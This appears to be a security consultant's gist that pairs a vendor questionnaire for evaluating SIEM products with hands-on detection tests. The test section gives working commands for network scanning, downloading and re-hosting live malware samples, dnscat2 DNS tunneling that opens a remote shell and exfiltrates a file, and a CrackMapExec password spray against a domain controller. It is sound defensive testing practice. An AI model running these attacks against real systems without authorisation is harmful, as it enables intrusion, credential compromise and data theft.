In episode 338 of the 7 Minute Security podcast, I talked about a recent engagement where I helped a customer do a bit of a SIEM solution bake-off. This gist is the companion to that episode, and is broken down into the following two sections:
Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible
SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution actually coughs up alerts on the things it should indeed whine about
Introduction / Purpose
CustomerX desires to implement a SIEM solution to protect endpoints within their LAN in SomeCity, SomeState and their self-hosted datacenter (provided by SomeCompany in SomeState).
This questionnaire is designed to help prime the conversation CustomerX wants to have with each vendor, so that when each vendor comes in to discuss and present their solution, CustomerX can gather the same set of criteria from each one, and make the most well-informed purchase decision possible.
It is not expected that the vendor prepare a written response to this questionnaire ahead of time (though that is an option), but it is expected that the vendor be ready to answer these questions when meeting with CustomerX.
The document is broken into several high level topics, with appropriate sub-topics and questions nested within each one.
Demo / trial period
Do you provide a demo or trial period of your product?
If yes, how long?
Any limitations during the trial period (e.g. number of alerts, reduced functionality, etc.)?
Are there any costs associated with a trial period / demo unit?
With CustomerX's environment in mind (a network diagram will be provided), what will be the ideal sensor deployment configuration?
And what are the options for log flow (i.e. does it make sense to have one sensor per LAN, or could devices at the datacenter push their logs to a single sensor located at CustomerX's home office)?
What form can the sensors be in (physical/virtual/both)?
Traditionally, SIEMs need a lot of ongoing tuning to be effective, so how much of that will be done on the vendor side vs. CustomerX's responsibility?
Does the sensor provide any IDS/IPS functionality?
Is the sensor interface Web-based or provide console access (or both)?
Do you provide an agent or agentless configuration (or both)?
What operating systems, software and devices can you interpret logs from (include cloud services like O365, Google Apps, etc)?
Conversely, which can you not?
What would be the recommended logging configuration for CustomerX - just key servers or "everything" (including workstations)?
What are the various ways the sensors can gather network/endpoint logs and traffic?
Are there any limits to the log ingest of your solution?
Are the logs stored locally on the sensor(s), in the cloud, or both?
How long are logs kept?
What costs (if any) are generated to store logs longer than the default time?
What log searching capabilities will we have to find information from past events and alerts?
Will that searching require any additional software/hardware?
Can we cleanly export that data, if necessary, into an easy-to-read format like .CSV or .PDF?
Is the overall look/feel of your solution's interface customizable?
Is there an extra cost associated with building functionality/dashboards/etc. that are not standard?
Will it be possible to create custom alerts?
Is there an extra cost associated with doing so?
Can we create custom reports?
Is there an extra cost associated with doing so?
Provide some examples of your solution being able to detect/alert/stop common threats. Examples:
Email phishing attempts
Hacker lateral movement
Provide some examples of areas where your solution's ability to detect/alert/stop threats needs improvement.
How will this solution help improve our security posture?
How will this solution save us money?
Does your solution provide any vulnerability scanning functionality for the internal or external network?
How can your solution help me find systems that aren't currently being logged but probably should be (e.g. the IT group spins up a new Windows server but forgets to tell anyone)?
Are you utilizing threat feeds to make decisions on what justifies an alert? If so are those public sources or proprietary (or both)?
Will you provide engineering resources to install the sensors?
And if so, is that an extra cost?
Is any training available so our staff can get up to speed on using this solution?
What are the associated costs, if any?
What day-to-day support options are available if we need help (phone/email/etc.)?
What do the various support options cost?
What are support hours?
Will an SLA be signed as part of this?
What compensation will we receive if SLA is not met?
Will you help us install this - i.e. do you provide support in deploying the necessary hardware/software to get the sensors up and running?
How often do you push updates/fixes/releases - and who installs them?
What features did you add to your last major release?
What feature of your product is lacking in functionality and may require development?
Costs / licensing
How is the monthly cost of this solution calculated (number of endpoints monitored, amount of log ingest, etc.)?
What "gotchas" (if any) exist that might cause us to incur more costs?
How can you help justify your product to our board in terms of ROI?
This is a series of tests I conducted to test the effectiveness of some SIEM solutions I was evaluating for a customer. I kept a detailed log of each test done, the URLs involved, the source and destination IPs, and timestamps for everything. That way the vendor has all the info they need to go through the logs and investigate issues if necessary.
Note: before doing these tests I highly recommend you spin up a fresh Kali or Windows VM, get it fully patched and snapshot it. That way you're playing it extra safe in case you jack up the machine as part of these tests.
Although some SIEMs ignore nmap scans, it doesn't hurt to fire one off anyway. Drop to a Terminal and do something like:
nmap -Pn 192.168.0.0/24 -oA internal-scan
Replace 192.168.0.0/24 with your own network range. The -oA flag will output your scan in XML, standard nmap and grepable nmap formats (cuz' why not?) that you can have on hand if your vendor wants to look at them.
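As a side note, the grepable (.gnmap) output makes it easy to pull open ports out later. A quick sketch against a fabricated one-line .gnmap file (the host and ports here are made up purely for illustration):

```shell
# fabricated one-line .gnmap sample, just to show the file's shape
cat > sample.gnmap <<'EOF'
Host: 192.168.0.10 ()  Ports: 22/open/tcp//ssh///, 445/open/tcp//microsoft-ds///
EOF
# pull out just the ports nmap saw as open
grep -o '[0-9]*/open' sample.gnmap   # prints 22/open and 445/open
```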
Do a similar scan to some external IPs you own - like your home router IP or AWS/DO droplets that you operate.
Head to PhishTank and look through the recent submissions, as well as ones that have been around for a few days. Take a few that are served over plain HTTP, then fire them up and submit bogus usernames/passwords/account info/etc.
Get an account at VirusBay and download a dozen or so samples. I usually take 6 "fresh" ones, and 6 that have been around for 3+ days.
To give the SIEM a bit more of a fighting chance, I also upload these samples to a Digital Ocean droplet and re-download them over HTTP. You can do that pretty easily by SFTPing all those samples to a folder like /icky on your droplet, then cd to that directory and do:
python3 -m http.server
Then you can just hit http://the-ip.of.your.droplet:8000 (http.server listens on port 8000 by default) and grab all the samples.
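Putting that serve-and-fetch dance together end to end looks something like this (sketched against 127.0.0.1 with a harmless stand-in file so it's runnable anywhere; on the real test you'd cd to your samples folder on the droplet and fetch from its public IP instead):

```shell
# stage a folder with a harmless stand-in "sample" and serve it over HTTP
mkdir -p /tmp/icky
echo "malware-stand-in" > /tmp/icky/sample1.bin
cd /tmp/icky
python3 -m http.server 8000 &   # http.server listens on port 8000 by default
SERVER_PID=$!
sleep 1
# the re-download; on the real test this hits the droplet's public IP
curl -s -o /tmp/fetched.bin http://127.0.0.1:8000/sample1.bin
kill $SERVER_PID
```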
To simulate DNS tunneling, you'll need both a server and a client.
I like to just use a basic Linux DO droplet for this. Grab a copy of dnscat2 and extract it to a folder like
/dnscat. Then start the server with:
ruby ./dnscat2.rb --dns host=YOUR.DROPLET.IP.ADDRESS,port=53 --security=open
Note: whenever I set this up on a fresh Ubuntu box I forget to read the instructions which tell you to do:
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install
This always seems to fail for me, and I find that I'm missing one or more pre-requisites:
apt-get install build-essential
apt-get install ruby
Additionally, once I go to fire up the dnscat2 server, sometimes systemd-resolved is hogging port 53 and won't let the server start, so I nuke it with this (note: this breaks local DNS resolution on the box until you start it again) and try again:
sudo systemctl stop systemd-resolved
Now for the client side: again, grab dnscat2 and extract it to a folder on the client machine. Then, from that directory, create a test file or two to actually exfiltrate over DNS (the data will be just random garbage). For instance, to create a 1 MB garbage file:
dd if=/dev/urandom of=1mb.txt count=1024 bs=1024
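To be able to prove end to end that the exfil worked, I also like to record a checksum at creation time. A small sketch using /dev/urandom (so the payload is genuinely random bytes rather than zeroes); after the dnscat2 download finishes, you can run md5sum on the server-side copy and the hashes should match:

```shell
# build the 1 MB garbage file from random bytes and note its checksum
# (dd's progress chatter is sent to /dev/null)
dd if=/dev/urandom of=1mb.txt count=1024 bs=1024 2>/dev/null
md5sum 1mb.txt
```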
And now, on your Linux client, run this to connect to the dnscat2 server:
./dnscat --dns server=YOUR.DROPLET.IP.ADDRESS
If it's a Windows client, run the Windows client binary (the exact .exe name depends on the release you downloaded):
dnscat2.exe --dns server=YOUR.DROPLET.IP.ADDRESS
Now back on the server, you should get some message saying a shell has connected. To interact with it and download your garbage file, first connect to the new session:
session -i (plus the session number, which is probably 1)
Now drop to a shell:
shell
Then press Ctrl-Z to back up to the main window so you can connect to the new shell session.
Connect to the new session:
session -i (plus the new session number, which is probably 2)
Run a directory listing to validate you're receiving output from the shell:
ls (or dir on a Windows client)
Press Ctrl-Z again to back up so you can connect back to the original session.
Connect to the original session:
session -i (plus original session number, which is probably 1)
Finally, download your garbage file:
download 1mb.txt /tmp/1mb.txt
Optionally, you can ensure the transfer is happening by opening a new Terminal window and watching with tcpdump (-n keeps tcpdump from generating DNS lookups of its own):
sudo tcpdump -n port 53
Note: This simple DNS test is my favorite, and in my opinion, vendors should absolutely pick up on this. I had one vendor tell me "Well, we didn't know what the DNS baseline looked like yet, so we didn't alert on it." My argument was, "I don't think that a single host should be making hundreds of thousands of DNS requests to a single IP, right?"
Load up a list of 20-30 domain users in a file called users.txt and then use CrackMapExec to password spray them using a single password. For example:
crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u users.txt -p 'Winter2018!'
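The users.txt file is just one username per line. A hypothetical example (these names are made up - swap in 20-30 real accounts from the target domain):

```shell
# hypothetical usernames -- replace with real accounts from the domain
cat > users.txt <<'EOF'
asmith
bjones
cdoe
EOF
wc -l users.txt   # prints: 3 users.txt
```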